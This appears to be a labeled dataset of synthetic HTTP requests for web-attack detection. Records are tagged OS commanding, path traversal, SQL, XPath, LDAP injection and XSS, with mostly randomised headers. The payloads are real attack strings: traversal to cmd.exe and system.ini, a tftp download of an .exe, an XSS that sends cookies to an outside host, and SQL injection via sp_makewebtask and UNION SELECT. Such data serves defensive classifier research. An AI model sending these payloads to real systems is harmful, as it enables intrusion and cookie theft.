X-Forwarded-For: 3.212.183.96
X-Serial-Number: 625258146857624239
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42208
Start - Id: 44187
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 195.16.38.45
Connection: close
Accept: audio/x-wav, audio/*
Accept-Charset: iso-2022-kr, hz-gb-2312;q=0.1, iso-8859-4;q=0.1, ks_c_5601-1987, iso-8859-8-i;q=0.4
Accept-Encoding: compress;q=0.5
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Thu, 23 Nov 06 21:38:59 UTC
ETag: "v0U9uAwSq_0imKTW"
Expect: tndt=le3s;e8nEso=Izpi
From: gozi@ydNwdaf.st
If-Modified-Since: Wed, 29 Aug 07 24:56:10 UTC
If-Unmodified-Since: Wed, 07 Jan 04 03:20:55 GMT
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: Thu, 30 Dec 04 04:25:15 GMT
Max-Forwards: 7485
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 22399-
Referer: /whtdn/p01hbne.pdf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.1 (Machintosh; U; PPC Mac OS X 3.5; hB-el; rv:9.0.0) Gecko/96358792
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 389x154
Via: 9.4 35.174.121.35, tadhoe/8.3 82.252.108.104:8, 0.6 www.dbethx.tiff
Transfer-Encoding: deflate
Upgrade: daad/0.7, ule/2.7
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44187
Start - Id: 36061
class: PathTransversal
GET /c-tWOa.K2YT/d7ecaTerabb/seu0lrt/eo5nlaao0nlewntrmdee/easbhuihptodoWrlshe/od7k8IbLz/7h7s38a7jdlscn9ovh/og1eFhyH/Fdt1stwl4ehsraic/r@kj2yDN6em.pl?hcrodAhetnsxed9=stenalerm&cwDGuWNL6=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&nhyp=emrEfx9p77t+d&othsreoZHanheny=wuee&ikhoiuihnkho=906531575&leepnsreteswlti=eybkfgnpKid&ofhb6eiavItO=gthb HTTP/1.0
Host: 56.76.105.155
Connection: sivOjtv
Accept: */*
Accept-Charset: ks_c_5601-1987, koi8-r
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 67.249.93.38
Cookie: cjgse=9hUXufyADw;8Re57=tIpeetjtstnh;oeeoo=to s
Cookie2: $Version="742"
Date: Mon, 05 Mar 07 02:05:37 CET
ETag: W/"eoUm6-5kYY9C4OBMf"
Expect: eeafeono
From: 17ii@oeayeoc.biz
If-Modified-Since: Fri, 25 Feb 05 23:34:02 CET
If-Unmodified-Since: Fri, 13 Feb 09 14:07:13 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Aug 09 13:31:24 UTC
Max-Forwards: 76
MIME-Version: 1.3
Pragma: De=5idT
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -31,-3,49859-
Referer: /eAtaked/rtoh/ttq6Dd4e.cgi
TE: deflate
Trailer: Warning
User-Agent: eCnUdtosho (bGVmqveX; dL6UDfEXV)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/6.8 103.130.154.78, 6.0 www.xan3n.gif, 3.1 www.1moleexq.css:441
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36061
Start - Id: 49386
class: XPathInjection
GET /uSfdaZMea/8O4wgetWB1inserttl-woks/dK9x7SumuH9/seriDrqUupRzKYP/o-8qxFIj4xzj/aotasrjS/nhrkueoomeznuh/nmV/n6saCkxtgmes/iHnHTvAi/rjurHgxsGEVj5sJq_6P.php?UMG3tK=7479+++or+7rct%2Fe5S%2Fog%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D60%5D++or++++819%3D&93wNxDqhA=963547 HTTP/1.0
Host: 161.80.152.174
Connection: keep-alive
Accept: image/png;q=0.2
Accept-Charset: koi8, iso-8859-15;q=0.6, cp-950;q=0.4, iso-8859-7
Accept-Encoding: compress;q=0.4, gzip, identity, identity;q=0.2
Accept-Language: miinCid-aucisg;q=0.0, Dled4mJy-liit
Cache-Control: only-if-cached
Client-ip: 227.191.80.33
Cookie: H4Vku7@bqF8=e
Cookie2: $Version="35"
Date: Tue, 31 May 05 10:56:37 UTC
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: Pmsahe=aeni1iw
From: pail@dkPluia.de
If-Modified-Since: Mon, 08 May 06 12:42:59 UTC
If-Unmodified-Since: Sat, 25 Sep 04 15:04:35 GMT
If-Match: *
If-None-Match: "3cQ0DxcbwvtPpZC"
If-Range: *
Max-Forwards: 688
MIME-Version: 7.0
Pragma: t=otihemeu
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: NTLM bWhoaWVkdWZnZWVuZXF3ZXJhdHRjb3NucnNEZnJFd3RlSW9oZWxobGhvYXJqMWFh
Range: -33311,24-
Referer: http://it66ehi.org/yenpa/hkhnn/a3n0tlo/vindIFlv.shtml
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 4.8; ui-5e; rv:6.3.9) Gecko/51859053
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: HTTP/8.3 www.hEell.css:410, geeono/2.0 134.247.195.247
Transfer-Encoding: identity
Upgrade: titdOa/5.1
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 9327975536472
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49386
Start - Id: 36853
class: LdapInjection
GET /cGpY4Tx6xIIcjRNIKj/ijZpvw6/dydhehsea/f_C2EEqgeo0@3a/Dr/cvUxpG/fxmI.jpg?ineeE1nay=ho3rI8hoqnntr&Etaijrle=Ss&iseviiceiEf=tlTi4o%27leid+9echohI0hno&8o=dse7%5Dpn%2Fe&@-inetcatky.DAecho=+&ttb0urN7nhE6ee=57829&EOIDz_X=hTCqrKNe3JqF&sdi0A=2557 HTTP/1.1
Host: 178.63.166.193:6
Connection: nrbed
Accept: image/*, audio/*;q=0.5
Accept-Charset: windows-1251
Accept-Encoding: 90)(&(objectClass=3url)(|(sn    =   ra)(cn=it J*))
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Cookie: ea2ae=62506243;lfed=3059200607;8-@L=88410692
Cookie2: $Version="869"
Date: Thu, 31 Jan 08 24:46:46 UTC
ETag: W/"FaFmDxnZfXPqO-EeP"
From: lvelladt@3trbvtitH.net
If-Modified-Since: Fri, 15 Oct 04 19:25:26 GMT
If-Unmodified-Since: Fri, 29 Dec 06 03:16:31 CET
If-Match: "GFONQ2Kta4_W@mnc"
If-None-Match: *
If-Range: *
Max-Forwards: 108
MIME-Version: 9.2
Pragma: 0whilhi=tb
Authorization: Digest cnonce="Ta7n"
Range: -0235,09-
Referer: /rioi/tnalid/rlrisau/rtFxtthl/ovroa.js
User-Agent: yshrPt (w@I6jD; uhZ5-SqWJS; tDZzj.K7; yDZa-h)
UA-Color: color32
UA-Pixels: 6170x381
Via: 0enwi/6.3 69.33.121.221:3
Transfer-Encoding: compress
Warning: 449 www.1trt.gif:081 "UlredsomtoT1g" "Sat, 20 Feb 10 20:48:04 UTC"

null

End - Id: 36853
Start - Id: 43631
class: OsCommanding
POST /ab4xttspaZlss/xk6W/gezsbe/Rc1u2ghRh/7sxieievke3a/bifotirmerEhdethqi4/nvqNn17sZ9wbqhLH/sS/sdsoeehclaeyhesaawD/sKucR.msf? HTTP/1.1
Content-Length: 144
Content-Language: enern,a8,htc0n
Content-Encoding: identity
Content-Location: http://www.pywoa.com/aYOdx9e/lrthvn/oimbrrem/yaElnh.msf
Content-MD5: bnRmaGJpdm4zcmNtYmNzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Mar 09 22:41:25 CET
Last-Modified: Fri, 06 Feb 04 07:16:56 CET
Host: www.uIees.de
Connection: oqaOIldg
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 74.56.238.145
Cookie: ccntozjf=yodahnte2d;X1Gwautoexec1sreplacem=?$do0eit=otheastyle;ei=eg;XTtshanntS56so=' ;    ps     -aux;
Cookie2: $Version="7"
Date: Wed, 16 Aug 06 07:35:55 CET
ETag: W/"BoI.y1OBAJbXOx8"
Expect: 100-continue
If-Unmodified-Since: Tue, 17 May 05 16:24:17 CET
If-Match: "06eIWVKwTWwydY6R3qR"
Max-Forwards: 53
Authorization: ndup ft4i=nEgC
Referer: http://syhr.ch/soilnl/een9lsg/Efuntett.sh
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 4.8; 6g-6i; rv:6.3.0) Gecko/76836955
UA-Disp: 9318,8305,16
Via: HTTP/2.6 246.247.83.104, 6.2 245.74.141.113, 9.0 www.ssaafs.html
X-Serial-Number: 3183555985904482173
----: -------------------

sl=cm%LaOd&t1dnh3oes=99&77sEeeOee=echall$8I&opfhronolie=] hfmvs$|?6npl&3tbj=91891631&JhqB=qnfKscriptesdeloyoet&etmfjU=58&5dh8te1r=SP

End - Id: 43631
Start - Id: 45985
class: PathTransversal
PUT /sntn9v/t5scripta8Ktelnet-muB9NHr/efCzpuK4I/sEYZo0i3Jmh46AuD-69E/emPCyZljAZyvImN/deuo14beiifdui8oaan/RlatUj2cG2n/crhm8te0bnqtee5br4/dsgaega/ygmsewgw/NuesfOoe4c.exe? HTTP/1.1
Content-Length: 270
Content-Language: uenhdas,hHbe,t
Content-Encoding: gzip
Content-Location: http://vagij4jc.org/rnhRna/tnDoaiO.rar
Content-MD5: QmFtRXVndDdvZnJoaUhoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Jul 06 05:08:02 GMT
Host: 206.230.185.49:623
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean;q=0.9, x-mac-cyrillic, big5, iso-8859-6, euc-tw
Accept-Encoding: *
Accept-Language: qehee-msbbr
Cache-Control: max-stale
Client-ip: 250.34.233.65
Cookie: hsTi=cmdces7a~Telf+bt;se2au4o8v=ta
Cookie2: $Version="279"
Date: Wed, 14 Jan 04 21:13:47 GMT
ETag: "iL.lhMF7FSpD_jLo"
Expect: 100-continue
From: mtyt4ns@shaohiwie.it
If-Modified-Since: Wed, 28 Mar 07 11:33:25 CET
If-Unmodified-Since: Fri, 16 May 08 02:39:27 UTC
If-Match: "_md@BtjNJW6BKvBG"
If-None-Match: *
If-Range: Sat, 17 Jan 09 05:20:54 CET
Proxy-Authorization: eelo uasuthoo=eyfL
Authorization: Basic SW12MHBmdG46dGhiYWVv
Range: -2042
Referer: /svenwh0.jsp
User-Agent: ..\..\..\..\..\..\..\..\..\WINNT\system.ini
UA-Pixels: 705x843
Via: FTP/4.6 www.otahaqii.htm, r59ta8/0.1 www.sCo48.shtml, 4.9 245.139.73.133
X-Serial-Number: 9739986

erinsertflikeBP=wKYelKXxU&esarNsr1f=fQo&isaugnireeuw=iioOIots&8afgiuhsnrh=bbice&sareoldoef=183303&hiieIoejh= 1nl&IeEonrl=57998015&Fs2tyOE9w=nVjerzzUP&reo=Igouds\uhi&nwzarmasswl=2947&sRlleivuWhidSs=Oi pr ancgroup byeoromer Htf&seoctsi5je=md&5kmbb57=hff&eu0rtketsbnoo=38

End - Id: 45985
Start - Id: 46924
class: XSS
POST /yh/emmNGQ/tmlnsnyr/FBgZhaving/uououTerKadiieo.php4? HTTP/1.1
Content-Length: 219
Content-Language: dcoylte,8kua
Content-Encoding: compress
Content-Location: /aeuttth.bin
Content-MD5: OG5BdDNpcnNhYXJvZWh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Jan 08 22:56:04 GMT
Last-Modified: Thu, 09 Mar 06 03:45:20 CET
Host: www.erekj.fr:80
Connection: aMtneCx
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-i9eggnlo;q=0.0, nhoc-g3flnk, x-dai;q=0.0, dhtsItr-ihrt, tfeg-ekTtiosd
Cache-Control: no-store
Client-ip: 53.2.228.212
Cookie: 5pSiaviude1=qatfsalu;dktcognAt1Zs=eolietono;pdiyennfiwxhnlh=unionetc
Cookie2: $Version="0"
Date: Sat, 24 Oct 09 19:55:02 UTC
ETag: "PHboy0zuXK2HGGduWM_"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Tue, 06 Nov 07 18:09:18 UTC
If-Unmodified-Since: Fri, 08 Oct 04 09:04:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Apr 05 13:22:53 CET
Max-Forwards: 934
MIME-Version: 9.1
Pragma: osdaa6y=oe
Proxy-Authorization: Basic Ym9lZGVuOjl1OGpJbg==
Authorization: Basic ZG1lY21jOm5pbHE=
Range: -790
Referer: http://34ezglo.com/ieryrSo/keieeh.jpg
TE: deflate,chunked
Trailer: Accept-Encoding
User-Agent: ltlwgltffo/4.2.7
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 5.6 30.229.92.116:976, uhptG/9.5 245.142.8.51, awe3e/8.4 49.110.174.190:5745
Transfer-Encoding: letij
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fdhfEppv6fnn=Uwketmc03oeaecedoz&e8=qUoP&Ozq=87&osil=7327521&sU8ox=&{[document.location.replace  ('http://www.tireicin.com/cgi-bin/tame.cgi'+document.cookie);]};&npklnsls4aunm=m5x4RStwFS

End - Id: 46924
Start - Id: 44885
class: PathTransversal
GET /emot/HeZ9_ScK0_1/ihahetbslpp18/9GpGTxR7lY-Xa2g1N1y.mdb?llSaRwne05rrem=201491&tmpdTtnodeiframeH=z3FPhl&nvffebetmk=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F HTTP/1.0
Host: 88.245.158.44
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate, identity;q=0.0, identity
Accept-Language: *
Cache-Control: max-stale=89146
Client-ip: 28.173.55.36
Cookie: b5nss=CAqa;Fntat5wnTb=102;ehhWsaEsdpzhSn=83;sicclqtnt5dct=Ex;2dedetVeL0htHo=caU6tesgytea
Cookie2: $Version="72"
Date: Sun, 26 Jun 05 21:11:09 GMT
ETag: "Fg6uxv@CUmKOi65"
Expect: 100-continue
From: lalrk0d@mOge.gov
If-Modified-Since: Wed, 14 Feb 07 07:17:28 UTC
If-Unmodified-Since: Wed, 16 Jun 04 21:04:10 CET
If-Match: "WBL@5hL_Hit7g2QoC.p"
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 2.7
Pragma: nE=R3r
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic b3VBRW5kS3M6dW80c250ZXM=
Range: -41,56231-,-8575
Referer: /EnOtja/Anemrse/aoT3iq/rfa2e/scz8au7X.jsp
TE: trailers
Trailer: Expect
User-Agent: Mozilla/7.7 (Windows; U; WinNT 2.2; os-rV; rv:6.5.6) Gecko/76031205
UA-CPU: StrongARM
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 134x0521
Via: lZ2b/2.7 www.nWlgw.css, 3.0 www.en1t.jpeg, HTTP/2.0 www.TgtoeoUT.css:0
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44885
Start - Id: 43693
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.qNbDoaihet.biz
Connection: close
Accept: text/html;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 113.72.226.52
Cookie: 7sh=yiItn;soUataenms=auh0f(linkulzc';Nos=5729338;Ttpto=1566;majhaseme=A execn5;hE13tFere=3428
Cookie2: $Version="87"
Date: Mon, 24 Mar 08 05:14:49 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: y3oqSbyn@4aAdpOcPia.gov
If-Modified-Since: Tue, 19 Sep 06 17:53:15 CET
If-Unmodified-Since: Sat, 13 May 06 14:41:11 CET
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: "L6PRZ9JqVZTekuICg"
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 474
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /jiis6kf/OweUt/sbi2I.ace
TE: trailers,deflate;q=0.7
User-Agent: Mozilla/0.9 (X11; U; Open BSD i586 2.5; Ai-pe; rv:9.7.5) Gecko/19609607
UA-CPU: StrongARM
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 827x275
Via: 6.3 72.169.10.81:1, stlo/3.5 50.86.7.132:944, FTP/1.8 www.ytddYOt.tiff
Transfer-Encoding: deflate
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43693
Start - Id: 38459
class: LdapInjection
GET /efftsOnGheLlttotr.gif?id6jeO1putp=5906&kTvstfafsrso=576&u6loozYcp=c&LsTuf_admintCS=v1hwc%29%28+++%7C+%28p1a%3D*%29&ndHidIjnsmn1bKI=oexecy-eirlciradmin&ha=wner4n&dagaebslcicwcT=aeo7&snim6rezal=ozwehi3DnmEaet%5Cobject7&Nrrtt6enflYhec=760855886&fHi0aenli=353903&te=9066116&rdomeps=18649434&beaaaoel=xfsjnaistbxnu%2F HTTP/1.1
Host: www.eoDxtms.st:810
Connection: knUq
Accept: audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 131.162.142.41
Cookie: php0cattDZo0Y.=yarrxtermsd/o;nkBo=es1hoteagNt;onahodasaiAmlnr=sieiielprhRh;bnifdl=e7;e;9h=objectwhf%sldiv;jeeWts7aens5t=812
Cookie2: $Version="35"
Date: Tue, 11 Aug 09 01:01:00 GMT
ETag: W/"sni_BG6ZUp2YwDsYzq5j"
Expect: 100-continue
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sat, 23 Dec 06 24:50:10 GMT
If-Unmodified-Since: Fri, 23 Jan 04 01:43:42 CET
If-Match: "umgmdH3Pk..eY0_P0-hh"
If-None-Match: *
If-Range: Fri, 05 Jun 09 09:18:42 UTC
Max-Forwards: 921
MIME-Version: 3.3
Pragma: o3autEen=elpo
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic ODVuc25naGw6bmF4dG1p
Range: 24-,76759-,-19589
Referer: http://www.otge.it/ny0hEH.tar
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.8 (X11; U; Open BSD i386 9.0; Zt-ts; rv:5.4.2) Gecko/40167623
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 3.1 www.taeaEet.tiff:36
Transfer-Encoding: deflate
Upgrade: he9qat/8.2, oIocas/7.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38459
Start - Id: 36394
class: OsCommanding
GET /ZN@T-/e1fBFUe6fPnR6UPF2bg/tt6blonyesntgSt/5iOb/un1qrarrygtsh9guonl/dut7ecinhnRsye/ltrtsrlh/e5lw1tniaeemaenw.cfm?tbo3iotnHmaruIe=7437&p8Hw=dngelln HTTP/1.0
Host: 157.123.155.75:80
Connection: keep-alive
Accept-Charset: x-mac-arabic, euc-kr, x-mac-arabic, utf-7, ks_c_5601-1987;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: Rlwb-z1olegce;q=0.6, sae-toubru, uoeh-ir, i0ouAeo-beleS;q=0.0, 9tassiaw-iel;q=0.7
Client-ip: 210.16.183.193
Cookie: d3apOoI0=';    EXEC   master.dbo.sp_makewebtask     'c:\inetpub\wwwroot\tilST.jpg',     'SELECT a6kosl2i  FROM    gbe WHERE     xtype=''U'''
Expect: 100-continue
If-Modified-Since: Thu, 08 Feb 07 18:22:42 GMT
If-Unmodified-Since: Fri, 09 Jun 06 07:01:23 GMT
If-Match: "UDQ0OTQwTUBg6m1jOU"
If-None-Match: *
Referer: /onit/Wrt7nNen/eoawCn.mp3
User-Agent: O3bnn4dh (azlnOF_; lBMG_gjI; hshKOrewl; pR3OQvl-)
Transfer-Encoding: eiutph; aaoetsct=0simeiaa
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36394
Start - Id: 41327
class: SqlInjection
GET /xsGEKcEmZ/eloe56/fNq3ub3WahHPUGWnbMR/tJlmbeebgsuo5/oaaqr/owOTg/9b4wvYn/5suot5UelzreeigtpEei/0CZzwa/iexotr.jsp?aasosettNfsBtlo=ae8gn&gR3L=zL_%40_&etclZlxr=%3D&e5s=raheeor5Eteeoesra&ts6dlo9hi0szmoy=68535&tt0osjlqo6Tai=epositionu%3E+k%27ne+5ihiane&QMzaA03N3L=3450&ilaancohTjw=6076&VE0dorchildBEecho1M6=haew3&tAee=63952&dGgCntyeitrPe1a=lsaHi&sancdureeenkdle=l%3Btcitqne%26 HTTP/1.1
Host: www.a5kk5.de:5780
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.7, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 115.243.233.244
Cookie: gkI@f='    OR    'tk'  =   N'   ;sioaTarg07ha=zesDI
Cookie2: $Version="44"
Date: Sun, 07 Nov 04 10:26:26 CET
ETag: "K5YDmtSF-2KFk0_fdfD"
Expect: TeNzoaY
If-Modified-Since: Mon, 25 Dec 06 09:33:23 GMT
If-Unmodified-Since: Thu, 09 Aug 07 03:28:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.7
Pragma: Mak3azi='oE0gp6a'
Proxy-Authorization: aOscx rtu8=4sni
Authorization: NTLM ZWhuaHVlRWV6d2VldWxlYUltY3J6c2V0YWlkdXNzYWkydGQyYQ==
Range: -71,-00,-797
Referer: http://UdndslrD.be/2sulO.msf
TE: trailers,gzip
Trailer: Host
User-Agent: baaaeaif
UA-Disp: 1321,3529,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 654x944
Via: hnigmw/0.9 41.136.129.6, swb29/6.6 153.136.99.233
Transfer-Encoding: identity
Upgrade: wNr3h/2.0, bss/8.7, iho/9.9
Warning: 731 www.cyyerh.gif:8 "drlplsjnceh" "Fri, 01 Dec 06 07:00:44 CET"
X-Forwarded-For: 94.64.57.114
X-Serial-Number: 6745028
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41327
Start - Id: 42920
class: OsCommanding
GET /eXjFSeZmz/eid/6eUztCrKRUG-oB1/aCW3PWyHqMl.8/rszeyie/rLA.shtml? HTTP/1.0
Host: 15.75.92.223
Connection: Sbus
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: tftp   -c get  96.253.247.30:/trnest/llchseic.exe |
Cache-Control: no-cache
Client-ip: 86.91.237.39
Cookie: fKiyt=ehucHwwx;we=p;uhzngatwdiT=netcatoa;t4xetnui=oQz;llGypndtyze=81513706
Cookie2: $Version="903"
Date: Tue, 10 Nov 09 05:43:14 GMT
ETag: W/"S5VHMCUcdCF0564I3"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "egwlNH@JjxVbFnFOZN"
If-None-Match: "lcM8SE8.rlz8KQz"
If-Range: Mon, 09 Nov 09 12:49:17 GMT
Max-Forwards: 047
MIME-Version: 4.5
Pragma: i=aswn
Proxy-Authorization: Digest realm
Authorization: a4dL haem4n=0she
Range: 761836-
Referer: http://www.lnouqhm.fr/aengl0ln/jtesw9nN/kro2ijEs/iIdaiTh/u0dtwRhi.php4
TE: trailers,chunked;q=0.4
Trailer: Via
User-Agent: exonYseaenaBytq
UA-CPU: Sparc
UA-Disp: 0478,435,16
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: identity
Upgrade: L8ahqe/3.3, eola/5.9, onhrln/4.6, iticp/3.3, rnsA6/2.5
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Forwarded-For: 214.193.235.54
X-Serial-Number: 911589515153231

null

End - Id: 42920
Start - Id: 42533
class: SqlInjection
GET /hkluiufcaasxndeye/opuehNtdg/aj1FsvqdBnrvpQrEfgz/e1Tho/t-9o8pfVmLPT5m3/txJL@y0g1yuoTlt2y/emIoz3B-EG@NwpehZ.MU/a52eLinOZ52F1.IFbe7/hOnuR_lQ4-ztr5ExX/urRVr12LZTwSxcdKc9H/eTJPNEYYhVCCjis3gB.aspx?xaan=a&anmDoienkerkaR=602&KshutdownrZraIpOG=lea%29i&qhuni4fthehinhi=nchecolglcfeik&EMGqq5Syy=r-lofiyTwSsaAwjm09&eTt2d=ewi%27+++UNION+++++ALL++SELECT++++he1iono+++++FROM+stlbrn++WHERE+%27%27%3D++%27&tereltooInZl=dotadetsytteuot&WYnW@G=zr&nre4siWnthmeD=jxkQ-qk HTTP/1.1
Host: www.ocSe8.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: pek-hEeduaed;q=0.9, rd-osyS
Cache-Control: max-age=36
Client-ip: 10.107.43.154
Cookie: YpC8Vi6NCelN=gsr6oi;tlt8Ede287=oFbMMat;Ion=sn1t;6ti=Ijg69EcsT;ddblbgutt5iEH7=55
Cookie2: $Version="051"
Date: Thu, 07 Dec 06 06:32:15 GMT
ETag: "YaiKF0rmASDK-26T"
Expect: 100-continue
From: bs1as@pton6i0pc.org
If-Modified-Since: Mon, 16 Jan 06 11:56:32 UTC
If-Unmodified-Since: Fri, 12 Nov 04 08:02:17 GMT
If-Match: "p-AHgS@.WWFHvLrH"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 4
MIME-Version: 5.3
Pragma: drde='7e'
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: tgtCnw drelj=mmrlnd
Range: 79786-446
Referer: /nd66Mneq/bgjage/v7hk.nsf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: ho0xsmsu (ovUnZse)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 7.3 125.59.143.86, cotrl/2.5 www.htimiaar.tiff, FTP/6.2 22.2.180.118
Transfer-Encoding: identity
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 080 122.26.58.92 "S5IseRilndhbniaya" "Sat, 05 May 07 24:34:31 UTC"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42533
Start - Id: 36940
class: LdapInjection
POST /ouuoeefm/4xghA34/bkr2TJm2cbincNzF/p30bz/E5eTsam.wgetevalVlLpinclude/orreettlirwlirt/hB4dJ142UNjoi8GWV3/iRCf07MU8v_2KM/jntmza3nastgiw/eA.x-K/ozmzu7oM.jpeg? HTTP/1.0
Content-Length: 62
Content-Language: nbal,Hwyaahi
Content-Encoding: gzip
